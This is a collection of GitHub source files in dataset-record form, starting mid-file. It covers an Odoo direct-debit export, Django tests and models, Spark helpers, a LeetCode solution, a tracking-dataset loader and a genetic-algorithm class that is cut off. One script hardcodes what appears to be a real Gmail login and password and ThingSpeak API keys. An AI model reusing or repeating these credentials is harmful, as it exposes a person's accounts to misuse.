+= \"\\r\\n\"\n\n refresh_data_registry = ''\n\n # Refresh Registro de Datos\n for vat_number in registry:\n total_registry = 0.0\n invoice_ids = []\n\n for invoice in registry[vat_number]:\n invoice_ids.append(invoice)\n total_registry = total_registry + \\\n registry[vat_number][invoice]['amount_residual']\n\n # Paymen Transaction\n payment_transaction = self.env['payment.transaction']\n values = {\n 'amount': total_registry,\n 'acquirer_id': self.payment_acquirer_id.id,\n 'acquirer_reference': vat_number,\n 'currency_id': registry[vat_number][invoice]['currency_id'],\n 'reference': str(uuid4()),\n 'partner_id': registry[vat_number][invoice]['partner_id'],\n 'partner_country_id': registry[vat_number][invoice]['partner_country_id'],\n 'invoice_ids': [(6, 0, invoice_ids)],\n 'state': 'pending',\n }\n pt = payment_transaction.create(values)\n\n total = total + total_registry\n count += 1\n # 1 - Identificador de Deuda - tipo: numérico - long.: 5 - decimales: 0\n refresh_data_registry += '0' + self.file_date.strftime(\"%m%y\")[:4]\n # 2 - Identificador de Concepto - tipo: numérico - long.: 3 - decimales: 0\n refresh_data_registry += '1'.rjust(3, \"0\")[:3]\n # 3 - Identificador de usuario - tipo: numérico - long.: 19 - decimales: 0\n vat = re.sub('[^0-9]+', '', registry[vat_number][invoice]['vat'])\n refresh_data_registry += vat.rjust(11, \"0\").ljust(19, \" \")[:19]\n # 4 - Fecha primer venc. - tipo: numérico - long.: 6 - decimales: 0\n refresh_data_registry += (self.file_date + BDay(\n self.imputation_business_days)).strftime(\"%y%m%d\")[:6]\n # 5 - Importe primer venc. - tipo: numérico - long.: 12 - decimales: 2\n refresh_data_registry += str(int(round(total_registry, 3)\n * 100)).rjust(12, \"0\")[:12]\n # 6 - Fecha segundo venc. - tipo: numérico - long.: 6 - decimales: 0\n refresh_data_registry += \"0\".rjust(6, \"0\")[:6]\n # 7 - Importe segundo venc. - tipo: numérico - long.: 12 - decimales: 2\n refresh_data_registry += \"0\".rjust(12, \"0\")[:12]\n # 8 - Fecha tercer venc. - tipo: numérico - long.: 6 - decimales: 0\n refresh_data_registry += \"0\".rjust(6, \"0\")[:6]\n # 9 - Importe tercer venc. - tipo: numérico - long.: 12 - decimales: 2\n refresh_data_registry += \"0\".rjust(12, \"0\")[:12]\n # 10 - Discrecional - tipo: alfanumérico - long.: 50 - decimales: 0\n refresh_data_registry += \" \".rjust(50, \" \")[:50]\n refresh_data_registry += \"\\r\\n\"\n\n refresh_final_registry = ''\n # Refresh Registro Final\n # 1 - Identificación del registro - tipo: alfanumérico - long.: 13 - decimales: 0\n refresh_final_registry += \"TRFACTURACION\"[:13]\n # 2 - Cantidad de registros - tipo: numérico - long.: 8 - decimales: 0\n refresh_final_registry += str(count + 2).rjust(8, \"0\")[:8]\n # 3 - Total primer venc. - tipo: numérico - long.: 16 - decimales: 2\n refresh_final_registry += str(int(round(total, 3)\n * 100)).rjust(18, \"0\")[:18]\n # 4 - Total segundo venc. - tipo: numérico - long.: 16 - decimales: 2\n refresh_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 5 - Total tercer venc. - tipo: numérico - long.: 16 - decimales: 2\n refresh_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 6 - Filler - tipo: alfanumérico - long.: 56 - decimales: 0\n refresh_final_registry += ' '.ljust(56, \" \")[:56]\n refresh_final_registry += \"\\r\\n\"\n\n # Direct Debit File\n direct_debit_file = self.env['direct.debit.file']\n month = f'{int(self.file_date.strftime(\"%m\")):x}'\n filename = \"P\" + self.payment_acquirer_id.red_link_company[:3] + str(\n self.file_number) + month.upper() + self.file_date.strftime(\"%d\") + '.txt'\n\n # Control Registro Inicial\n control_initial_registry = ''\n # 1 - Identificación del registro - tipo: alfanumérico - long.: 9 - decimales: 0\n control_initial_registry += \"HRPASCTRL\"[:9]\n # 2 - Fecha de Generación - tipo: numérico - long.: 8 - decimales: 0\n control_initial_registry += self.file_date.strftime(\"%Y%m%d\")[:8]\n # 3 - Código de Ente - tipo: alfanumérico - long.: 3 - decimales: 0\n control_initial_registry += self.payment_acquirer_id.red_link_company[:3]\n # 4 - Nombre Archivo - tipo: alfanumérico - long.: 8 - decimales: 0\n control_initial_registry += filename[:8]\n # 5 - Longitud del Archivo - tipo: numérico - long.: 8 - decimales: 0\n control_initial_registry += str(\n len(refresh_initial_registry+refresh_data_registry+refresh_final_registry)).rjust(10, \"0\")[:10]\n # 6 - Filler - tipo: alfanumérico - long.: 56 - decimales: 0\n control_initial_registry += ' '.ljust(37, \" \")[:37]\n control_initial_registry += \"\\r\\n\"\n\n # Control Registro Datos\n control_data_registry = ''\n # 1 - Identificación de datos - tipo: alfanumérico - long.: 5 - decimales: 0\n control_data_registry += \"LOTES\"[:5]\n # 2 - Lote - tipo: numérico - long.: 5 - decimales: 0\n control_data_registry += str(self.file_number).rjust(5, \"0\")[:5]\n # 3 - Cantidad de registros del Lote - tipo: numérico - long.: 8 - decimales: 0\n control_data_registry += str(count + 2).rjust(8, \"0\")[:8]\n # 4 - Importe primer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_data_registry += str(int(round(total, 3)\n * 100)).rjust(18, \"0\")[:18]\n # 5 - Importe segundo vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_data_registry += \"0\".rjust(18, \"0\")[:18]\n # 6 - Importe tercer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_data_registry += \"0\".rjust(18, \"0\")[:18]\n # 7 - Filler - tipo: alfanumérico - long.: 3 - decimales: 0\n control_data_registry += ' '.ljust(3, \" \")[:3]\n control_data_registry += \"\\r\\n\"\n\n # Control Registro Final\n control_final_registry = ''\n # 1 - Identificación de fin - tipo: alfanumérico - long.: 5 - decimales: 0\n control_final_registry += \"FINAL\"[:5]\n # 2 - Cantidad total de registros - tipo: numérico - long.: 8 - decimales: 0\n control_final_registry += str(count + 2).rjust(8, \"0\")[:8]\n # 3 - Importe primer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_final_registry += str(int(round(total, 3)\n * 100)).rjust(18, \"0\")[:18]\n # 4 - Importe segundo vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 5 - Importe tercer vencimiento - tipo: numérico - long.: 18 - decimales: 2\n control_final_registry += \"0\".rjust(18, \"0\")[:18]\n # 6 - Fecha último vencimiento - tipo: alfanumérico - long.: 8 - decimales: 0\n control_final_registry += (self.file_date + BDay(self.imputation_business_days)).strftime(\"%Y%m%d\")[:8] \n control_final_registry += \"\\r\\n\"\n \n control_filename = \"C\" + self.payment_acquirer_id.red_link_company[:3] + str(\n self.file_number) + month.upper() + self.file_date.strftime(\"%d\") + '.txt'\n \n values = {\n 'name': filename,\n 'control_file_name': control_filename,\n 'date': self.file_date,\n 'next_business_days': self.imputation_business_days,\n 'count': count,\n 'total': total,\n 'file': base64.b64encode(\"\\n\".join([refresh_initial_registry + refresh_data_registry + refresh_final_registry]).encode('ascii', errors='ignore')),\n 'control_file': base64.b64encode(\"\\n\".join([control_initial_registry + control_data_registry + control_final_registry]).encode('ascii', errors='ignore')),\n 'payment_acquirer_id': self.payment_acquirer_id.id,\n 'description': self.payment_mode_id.name + ' ' + filename + ' ' + self.file_date.strftime('%d/%m/%Y'),\n }\n ddf = direct_debit_file.create(values)\n","repo_name":"vangrow/account-modules","sub_path":"payment_pagar_link/wizard/red_link_export_pagar_debit_wizard.py","file_name":"red_link_export_pagar_debit_wizard.py","file_ext":"py","file_size_in_byte":11772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23598109492","text":"from django.test import TestCase\nfrom .models import Category, Product\n\n\nclass TestProductModels(TestCase):\n \"\"\" Test product app models \"\"\"\n\n def setUp(self):\n \"\"\" Create test record \"\"\"\n self.category = Category.objects.create(\n name='test',\n friendly_name='Test'\n )\n self.product = Product.objects.create(\n name='Test Product',\n description='test',\n has_sizes='True',\n price='100',\n )\n\n def test_category_string(self):\n \"\"\" Test Category string method \"\"\"\n self.assertEqual(str(self.category), 'test')\n\n def test_category_friendly(self):\n \"\"\" Test Category friendly method \"\"\"\n self.assertEqual(str(self.category.friendly_name), 'Test')\n\n def test_product_string(self):\n \"\"\" Test Product string method \"\"\"\n self.assertEqual(str(self.product), 'Test Product')\n","repo_name":"anyahush/surf-the-wave","sub_path":"products/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44887953235","text":"file_path = 'source/recipes.txt'\n\n# Задача 1. Создание словаря из файла.\ndef dictionary(file_path):\n cook_book = {}\n with open(file_path, encoding='utf-8') as f:\n for i in f:\n dish_name = i.lower().strip()\n portion = int(f.readline())\n ingredients = []\n\n for item in range(portion):\n ingredient_name, quantity, measure = f.readline().lower().strip().split(\"| \")\n ingr_dict = {\n 'ingredient_name': ingredient_name,\n 'quantity': quantity,\n 'measure': measure\n }\n ingredients.append(ingr_dict)\n\n f.readline()\n cook_book[dish_name] = ingredients\n\n return cook_book\n\n\n# Задача 2. Получения словаря с названием ингредиентов и их количества для блюд.\ndef get_shop_list(dishes, person_count, cook_book):\n shop_list = {}\n for dish in dishes:\n ingredients = cook_book.get(dish.lower())\n if ingredients:\n for ingredient in ingredients:\n name = ingredient['ingredient_name']\n quantity = int(ingredient['quantity']) * person_count\n measure = ingredient['measure']\n if name in shop_list:\n shop_list[name]['quantity'] += quantity\n else:\n shop_list[name] = {'measure': measure, 'quantity': quantity}\n\n return shop_list\n\n# Задача 3. Работа с файлами.\ndef read_file_content(file_path):\n with open(file_path, encoding='utf-8') as f:\n lines = f.readlines()\n\n return len(lines), \"\".join(lines)\n","repo_name":"Saniu6ka/File","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73204999186","text":"#######################################################################################################################################\n# File Name: ContextProvider.py\n# Author: Ashish Tyagi\n# Date created: March 17, 2017\n# Date last modified: March 20, 2017\n# Python Version: 2.7\n# Description: Creates or reuses the spark context, SQL context \n#######################################################################################################################################\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SQLContext\n\nsparkContext = None\nsqlContext = None\nsparkStreamingContext = None\n\n# Creates a spark context if not exists already\ndef getSparkInstance():\n global sparkContext\n if sparkContext == None:\n # Create Spark Context\n conf = SparkConf().setAppName(\"Spark Stats Job\")\n # for local mode use following \n #.setMaster(ExecutionMode).set(\"spark.executor.instances\", 3).set(\"spark.local.ip\", \"127.0.0.1\")\n sparkContext = SparkContext(conf=conf)\n return sparkContext\n\n# Checks if spark context is present if not creates it and then creates or reuses the SQL context\ndef getSQLContext():\n global sparkContext\n global sqlContext\n if sparkContext == None:\n getSparkInstance()\n if sqlContext == None:\n sqlContext = SQLContext(sparkContext)\n return sqlContext\n","repo_name":"ashishtyagicse/SparkSASStatFunctions","sub_path":"utils/ContextProvider.py","file_name":"ContextProvider.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15247881489","text":"import copy\nfrom pprint import pprint\n\ndef _convert_tf(d, includes=[0]):\n for key in d.keys():\n x = d[key]\n if not x in includes:\n d[key] = False\n else:\n d[key] = True\n \n return d\ndef _get_around(matrix, row, col):\n \n build = {1:None, 2:None, 3:None, 4:None}\n \n WIDTH = len(matrix[0])\n HEIGHT = len(matrix)\n \n if not row == 0:\n build[1] = matrix[row - 1][col]\n if not row == HEIGHT - 1:\n build[4] = matrix[row + 1][col]\n if not col == 0:\n build[2] = matrix[row][col - 1]\n if not col == WIDTH - 1:\n build[3] = matrix[row][col + 1]\n \n return build\n\n\ndef genColMask(mat, edge_col_tiles=[0], ignore_tiles=[0]):\n build = copy.deepcopy(mat)\n access = copy.deepcopy(mat)\n hreps = 0\n lreps = 0\n for row in access:\n for item in row:\n #print(hreps, lreps)\n if not item in ignore_tiles: #don't run it on air or whatever\n around = _get_around(access, hreps, lreps)\n #print(\"Around: \" + str(around))\n tf = _convert_tf(around, includes=edge_col_tiles)\n build[hreps][lreps] = tf\n #print(\"TF: \" + str(tf))\n #print(tf, hreps, lreps)\n else:\n build[hreps][lreps] = {1: False, 2: False, 3: False, 4: False}\n lreps += 1\n lreps = 0\n hreps += 1\n return build\n\nif __name__ == '__main__':\n mat = [\n [0, 0, 0],\n [0, 1, 0],\n [1, 1, 1]\n ]\n a = genColMask(mat)\n \n for row in a:\n print(row)\n","repo_name":"enbyte/pytile","sub_path":"mask_col.py","file_name":"mask_col.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36715579820","text":"import smtplib \r\nfrom email.message import EmailMessage\r\nimport xlrd\r\nfrom xlrd import open_workbook\r\nimport os\r\nimport re\r\nimport requests\r\nimport serial\r\n\r\n\r\n\r\nclass Justmail:\r\n def __init__(self):\r\n pass\r\n \r\n\r\n def mail(self,message=None):\r\n \r\n msg = EmailMessage()\r\n \r\n user_from=input(\"sender mailid\\n\")\r\n user_to=input(\"receiver mail.id\\n\")\r\n user_sub=input(\"message subject\\n\")\r\n if not message:\r\n user_message=input(\"write the message\\n\")\r\n else:\r\n user_message = message\r\n\r\n msg['From'] = user_from\r\n msg['To'] = user_to\r\n msg['Subject'] =user_sub \r\n msg.set_content(user_message)\r\n # Send the message via our own SMTP server.\r\n print(\"\\nAre you sure you want to send this mail? (yes/no) \")\r\n user_inputyesorno = input()\r\n \r\n if user_inputyesorno ==\"no\" or user_inputyesorno ==\"NO\":\r\n print(\"\\n processing mail has been cancelled\")\r\n return\r\n elif user_inputyesorno == \"yes\" or user_inputyesorno == \"YES\": \r\n print(\"\\n_________________________\")\r\n \r\n try:\r\n \r\n server = smtplib.SMTP_SSL('smtp.gmail.com',465)\r\n server.login(\"sunithareynold@gmail.com\", \"dolly@doss123\")\r\n server.send_message(msg)\r\n server.quit()\r\n print(\"\\nEmail sent successfully.\")\r\n\r\n except Exception as e:\r\n print(e)\r\n pass \r\n\r\n\r\n def thingspeak(self):\r\n \r\n light_fan_status={\"ON\":1,\"OFF\":0}\r\n read_payload = {'results':2}\r\n read_url = \"https://api.thingspeak.com/channels/1098917/feeds.json?api_key=OQY7RQXDXMC51232&results=2\"\r\n \r\n try:\r\n response = requests.get(read_url)\r\n result = response.json()\r\n feeds = result['feeds']\r\n for i in feeds:\r\n print(\"light=\",i['field1'],\"fan=\",i['field2'],\"fan_speed=\",i['field3'],\"temperature=\",i['field4'])\r\n except Exception as e:\r\n print(e)\r\n \r\n light=input(\"write the light status(on or off) value into the thingspeak\")\r\n light_switch=light_fan_status.get(light.upper(),0)\r\n fan=input(\"write the fan status(on or off) value into the thingspeak\")\r\n fan_switch=light_fan_status.get(fan.upper(),0)\r\n fan_speed=input(\"write the fan speed value into the thingspeak\")\r\n temperature=input(\"write the temperature value into the thingspeak\")\r\n\r\n \r\n write_payload = {'api_key':\"6OZ715PMNAC6MRWN\",'field1':light_switch,'field2':fan_switch,'field3':fan_speed,'field4':temperature}\r\n write_url = \"https://api.thingspeak.com/update?api_key=6OZ715PMNAC6MRWN&field1=0\"\r\n\r\n try:\r\n response = requests.get(write_url,params=write_payload)\r\n print(response.json())\r\n except Exception as e:\r\n print(e) \r\n\r\n return {\"light\":light,\r\n \"fan\":fan,\r\n \"fan_speed\":fan_speed,\r\n \"temperature\":temperature}\r\n\r\n\r\n def serial_port(self,ts_reading):\r\n serialPort =serial.Serial(port = \"COM3\", baudrate=9600,bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)\r\n CurrentDataPacket=\"bluetooth is working\"\r\n print(serialPort.write(str.encode(CurrentDataPacket))) # GETTING OUTPUT FROM THE SERIAL PORT.\r\n str_readings = \"\"\r\n for k,val in ts_reading.items():\r\n str_readings += k + \" - \" + str(val)+\"\\n\"\r\n print(serialPort.write(str.encode(str_readings)))\r\n return str_readings\r\n\r\n\r\nobj=Justmail()\r\nobj.mail()\r\nts_reading=obj.thingspeak()\r\nsr_reading=obj.serial_port(ts_reading)\r\nprint(\"sr_reading:\",sr_reading)\r\n \r\nobj.mail(message=sr_reading)\r\n\r\n\r\n\r\n","repo_name":"sunitha-rs/custom_codes","sub_path":"mail1_thing1_serial1.py","file_name":"mail1_thing1_serial1.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24448485885","text":"\"\"\"Console script for check_my_certs.\"\"\"\nimport sys\nimport click\nfrom .check_my_certs import check\n\n\n@click.command()\n@click.option(\n \"-f\",\n \"--filename\",\n default=\"sites.txt\",\n help=\"File listing sites to check.\",\n show_default=True,\n)\n@click.option(\n \"-d\",\n \"--days\",\n default=14,\n help=\"Days until expiry for warning.\",\n show_default=True,\n)\ndef main(filename, days):\n \"\"\"Console script for check_my_certs.\"\"\"\n check(filename, days)\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main()) # pragma: no cover\n","repo_name":"bac/check-my-certs","sub_path":"check_my_certs/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31443341227","text":"# Given an array of integers, return indices of the two numbers such that they add up to a specific target.\n#\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n#\n# Example:\n#\n# Given nums = [2, 7, 11, 15], target = 9,\n#\n# Because nums[0] + nums[1] = 2 + 7 = 9,\n# return [0, 1].\n\n\n# def find_target_sum_indexes(arr: [int], target: int) -> [int]:\n# ht = {}\n# for i in range(len(arr)):\n# if target - arr[i] in ht:\n# return [i, ht[target - arr[i]]]\n# ht[arr[i]] = i\n# return []\n#\n#\n# class Solution:\n# def twoSum(self, nums: [int], target: int) -> [int]:\n# return find_target_sum_indexes(nums, target)\n\n# two-pointer\n# def twoSum(self, nums, target):\n# nums = enumerate(nums)\n# nums = sorted(nums, key=lambda x:x[1])\n# l, r = 0, len(nums)-1\n# while l < r:\n# if nums[l][1]+nums[r][1] == target:\n# return sorted([nums[l][0]+1, nums[r][0]+1])\n# elif nums[l][1]+nums[r][1] < target:\n# l += 1\n# else:\n# r -= 1\n\nclass Solution:\n def twoSum(self, nums: [int], target: int) -> [int]:\n hm: {int: int} = {}\n for i, n in enumerate(nums):\n if target - n in hm:\n return [hm[target - n], i]\n hm[n] = i\n return []\n\n\nif __name__ == '__main__':\n print(Solution().twoSum([2, 7, 11, 15], 9))\n # print(find_target_sum_indexes([2, 7, 11, 15], 9))\n","repo_name":"ruan65/python_algorithms_and_problem_solving","sub_path":"leetcode/hash_tables/a_1_two_sum.py","file_name":"a_1_two_sum.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19884502761","text":"import numpy as np\nfrom pytracking.evaluation.data import Sequence, BaseDataset, SequenceList\nimport os\nimport glob\nimport pdb\n\ndef PTBTIRDataset():\n return PTBTIRDatasetClass().get_sequence_list()\n\n\nclass PTBTIRDatasetClass(BaseDataset):\n \"\"\"VOTRGBT2018 dataset\n\n Publication:\n The sixth Visual Object Tracking VOTRGBT2018 challenge results.\n Matej Kristan, Ales Leonardis, Jiri Matas, Michael Felsberg, Roman Pfugfelder, Luka Cehovin Zajc, Tomas Vojir,\n Goutam Bhat, Alan Lukezic et al.\n ECCV, 2018\n https://prints.vicos.si/publications/365\n\n Download the dataset from http://www.votchallenge.net/vot2019rgbt/dataset.html\"\"\"\n def __init__(self):\n super().__init__()\n self.base_path = self.env_settings.ptbtir_path\n self.sequence_list = self._get_sequence_list()\n\n def get_sequence_list(self):\n return SequenceList([self._construct_sequence(s) for s in self.sequence_list])\n\n def _construct_sequence(self, sequence_name):\n sequence_path = sequence_name \n anno_path = '{}/{}/groundtruth_rect.txt'.format(self.base_path, sequence_name)\n try:\n ground_truth_rect = np.loadtxt(str(anno_path), dtype=np.float64)\n except:\n ground_truth_rect = np.loadtxt(str(anno_path), delimiter=',', dtype=np.float64)\n\n end_frame = ground_truth_rect.shape[0]\n\n img_dir = os.path.join(self.base_path, sequence_path, 'img') \n img_list = glob.glob(img_dir + \"/*.jpg\")\n img_list.sort()\n frames = [os.path.join(img_dir, x) for x in img_list] \n\n# return Sequence(sequence_name, framesv, ground_truth_rect)\n return Sequence(sequence_name, frames, 'PTBTIR', ground_truth_rect)\n\n def __len__(self):\n return len(self.sequence_list)\n\n def _get_sequence_list(self):\n sequence_list= [\n 'airplane',\n 'birds',\n 'campus1',\n 'campus2',\n 'circle1',\n 'circle2',\n 'classroom1',\n 'classroom2',\n 'classroom3',\n 'conversation',\n 'crossing',\n 'crossroad1',\n 'crossroad2',\n 'crouching',\n 'crowd1',\n 'crowd2',\n 'crowd3',\n 'crowd4',\n 'distractor1',\n 'distractor2',\n 'fighting',\n 'hiding',\n 'jacket',\n 'meetion1',\n 'meetion2',\n 'meetion3',\n 'meetion4',\n 'park1',\n 'park2',\n 'park3',\n 'park4',\n 'park5',\n 'patrol1',\n 'patrol2',\n 'phone1',\n 'phone2',\n 'phone3',\n 'road1',\n 'road2',\n 'road3',\n 'room1',\n 'room2',\n 'room3',\n 'sandbeach',\n 'saturated',\n 'school1',\n 'school2',\n 'sidewalk1',\n 'sidewalk2',\n 'sidewalk3',\n 'soldier',\n 'stranger1',\n 'stranger2',\n 'stranger3',\n 'street1',\n 'street2',\n 'street3',\n 'street4',\n 'street5',\n 'walking']\n return sequence_list\n","repo_name":"zhanglichao/cmdTIRtracking","sub_path":"cmdTIRtracking/pytracking/evaluation/ptbtirdataset.py","file_name":"ptbtirdataset.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"48"} +{"seq_id":"5757244154","text":"import sys\nimport math\nimport array as arr\n\nCOLOR_NONE = 0\n\n# ------------------------------\ndef calcRow( pos, maxCols ):\n return math.ceil(pos / maxCols)\n\n# ------------------------------\ndef calcCol( pos, maxCols ):\n mod = pos % maxCols\n if (mod == 0):\n return maxCols\n\n return pos % maxCols\n\n# ------------------------------\n# -1\n# ^\n# 1 2 3 4\n# ^\n# 5 6 7 8\n#\ndef goNorth( pos, maxCols ):\n if (1 == calcRow(pos, maxCols)):\n return -1\n\n return pos - maxCols\n\n# ------------------------------\ndef goEast( pos, maxCols ):\n if (maxCols == calcCol(pos, maxCols)):\n return -1\n\n return pos + 1\n\n# ------------------------------\ndef goSouth( pos, maxCols, maxRows ):\n if (maxRows == calcRow(pos, maxCols)):\n return -1\n\n return pos + maxCols\n\n# ------------------------------\ndef goWest( pos, maxCols ):\n if (1 == calcCol(pos, maxCols)):\n return -1\n\n return pos - 1\n\n# ------------------------------\ndef step(direction, pos, maxCols, maxRows):\n if (\"S\" == direction):\n return goSouth(pos, maxCols, maxRows)\n\n if (\"N\" == direction):\n return goNorth(pos, maxCols)\n\n if (\"E\" == direction):\n return goEast(pos, maxCols)\n\n if (\"W\" == direction):\n return goWest(pos, maxCols)\n\n# ------------------------------\ndef isOutOfBounds( pos, maxCols, maxRows ) :\n return pos > maxCols * maxRows or pos < 1;\n\n# ------------------------------\ndef manhattanDinstance(p1, p2, maxCols):\n r1 = calcRow(p1, maxCols)\n c1 = calcCol(p1, maxCols)\n r2 = calcRow(p2, maxCols)\n c2 = calcCol(p2, maxCols)\n\n return abs(r1 - r2) + abs(c1 - c2)\n\n# -------------------------------\ndef initGrid(maxCols, maxRows):\n grid = []\n grid.append(0)\n\n for x in range(0, maxCols * maxRows):\n grid.append(COLOR_NONE)\n\n return grid\n\n# -------------------------------\n#\n# steps: [S, W, E, E]\n#\ndef getValidPath(pathDefinition, grid, colArg, rowArg, colorArg):\n\n color = pathDefinition[0]\n startPosArg = pathDefinition[1]\n pathLenArg = pathDefinition[2]\n\n path = []\n\n for y in range(0, pathLenArg):\n direction = pathDefinition[3+y]\n\n path.append(startPosArg)\n newPosition = step(direction, startPosArg, colArg, rowArg)\n \n if (newPosition == -1): # out of bounds\n return []\n\n if (newPosition in path): # crosses itself\n return []\n\n if (y == pathLenArg-1): # letzter schritt\n if (grid[newPosition] != colorArg):\n return []\n else:\n # andere farbe\n if (grid[newPosition] != colorArg and grid[newPosition] != COLOR_NONE):\n return []\n \n # grid[newPosition] = colorArg\n\n startPosArg = newPosition\n\n return path\n\n# ------------------------------\ndef addPathToGrid(grid, validPath, color):\n \n for x in validPath:\n grid[x] = color\n\n return grid\n\n# -------------------------------\ndef draw(grid, outputFile, colArg):\n\n for x in range(1, len(grid)):\n if grid[x] == COLOR_NONE:\n outputFile.write(' ')\n else:\n outputFile.write('X')\n\n if x % colArg == 0:\n outputFile.write('\\n') \n\n return 1\n\n# ------------------------------\n\ndef main(args, outputFile):\n argIdx = 0\n rowArg = int(args[argIdx])\n argIdx += 1\n colArg = int(args[argIdx])\n argIdx += 1\n\n grid = initGrid(colArg, rowArg)\n\n posCountArg = int(args[argIdx])\n argIdx += 1\n\n for x in range(0, posCountArg):\n posArg = int(args[argIdx])\n argIdx += 1\n\n colorArg = int(args[argIdx])\n argIdx += 1\n\n grid[posArg] = colorArg\n\n pathCountArg = int(args[argIdx])\n argIdx += 1\n\n for x in range(0, pathCountArg): # path arguments\n colorArg = int(args[argIdx])\n argIdx += 1\n\n startPosArg = int(args[argIdx])\n argIdx += 1\n\n pathLenArg = int(args[argIdx])\n argIdx += 1\n\n pathDefinition = [colorArg, startPosArg, pathLenArg]\n for y in range(0, pathLenArg):\n stepArg = args[argIdx]\n argIdx += 1\n\n pathDefinition.append(stepArg)\n \n validPath = getValidPath(pathDefinition, grid, colArg, rowArg, colorArg)\n grid = addPathToGrid(grid, validPath, colorArg)\n\n draw(grid, outputFile, colArg)","repo_name":"tomtomsen/catcoder-addictive-game","sub_path":"level4/level4.py","file_name":"level4.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29874662424","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import m2m_changed\n\n# Create your models here.\n\nclass Message(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n content = models.TextField()\n created = models.DateField(auto_now_add=True)\n\n class Meta:\n ordering = ['created']\n\n#Crear el Manager de Thread\n\nclass ThreadManager(models.Manager):\n def find(self, user1, user2):\n queryset=self.filter(users=user1).filter(users=user2)\n if len(queryset) > 0:\n return queryset[0]\n return None \n def find_or_create(self,user1,user2):\n thread = self.find(user1,user2)\n if thread is not None:\n return thread\n else:\n thread=Thread.objects.create()\n thread.users.add(user1,user2)\n return thread\n\nclass Thread(models.Model):\n users = models.ManyToManyField(User, related_name='threads')\n messages = models.ManyToManyField(Message)\n updated = models.DateTimeField(auto_now=True)\n\n class Meta:\n ordering = ['-updated']\n\n# asociar al objeto Thread el Model Manager\n\n objects = ThreadManager()\n\n#definir la función que va a comprobar cuando un mensaje ha sido modificado\ndef messages_changed(sender,**kwargs):\n instance = kwargs.pop(\"instance\",None)\n action = kwargs.pop(\"action\",None)\n pk_set = kwargs.pop(\"pk_set\",None)\n\n false_pk_set=set()\n\n if action is \"pre_add\":\n for msg_pk in pk_set:\n msg = Message.objects.get(pk=msg_pk)\n if msg.user not in instance.users.all():\n print(\"({}) no é un usuario del hilo\".format(msg.user))\n false_pk_set.add(msg_pk)\n\n instance.save()\n\n pk_set.difference_update(false_pk_set)\n\n#activar la señal\nm2m_changed.connect(messages_changed, sender=Thread.messages.through)\n","repo_name":"spassaro80/CraigScraper","sub_path":"messenger/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1230374880","text":"from constrainedRandom import *\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport numpy as np\r\n\r\ndef get_random_weight():\r\n \"\"\"\r\n Select a random type of weight (used for mutation)\r\n :return: the string of the randomly selected weight\r\n \"\"\"\r\n rand = random.randint(0, 2)\r\n if rand == 0:\r\n return rand, 'assignment'\r\n elif rand == 1:\r\n return rand, 'quiz'\r\n elif rand == 2:\r\n return rand, 'project'\r\n\r\n\r\nclass DNA:\r\n \"\"\"\r\n Three weightings for the course that need to be adjusted\r\n Should be the grade achieved in each component (e.g. 80, 90, 70)\r\n \"\"\"\r\n assignment_grade = -1\r\n quizzes_grade = -1\r\n project_grade = -1\r\n \"\"\"\r\n Limits to each weight defined as variables\r\n \"\"\"\r\n limits = {\r\n 'assignment': (40, 60),\r\n 'quiz': (10, 30),\r\n 'project': (20, 40)\r\n }\r\n \"\"\"\r\n Mutation rate by %\r\n \"\"\"\r\n mutation_rate = 0.05\r\n\r\n def __init__(self, weights):\r\n self.weights = {\r\n 'assignment': float(weights[0]),\r\n 'quiz': float(weights[1]),\r\n 'project': float(weights[2])\r\n }\r\n self.fitness = self.calculate_fitness()\r\n\r\n def calculate_fitness(self):\r\n \"\"\"\r\n Calculates the fitness of the current DNA\r\n :return: the fitness (i.e. overall grade)\r\n \"\"\"\r\n return \\\r\n DNA.assignment_grade * self.weights['assignment'] + \\\r\n DNA.quizzes_grade * self.weights['quiz'] + \\\r\n DNA.project_grade * self.weights['project']\r\n\r\n def mate(self, dna):\r\n \"\"\"\r\n Mate with another DNA object to create a child\r\n :param dna: the other parent\r\n :return: a DNA object (child) that is the cross over of both DNAs\r\n \"\"\"\r\n new_assignment_weight = (self.weights['assignment'] + 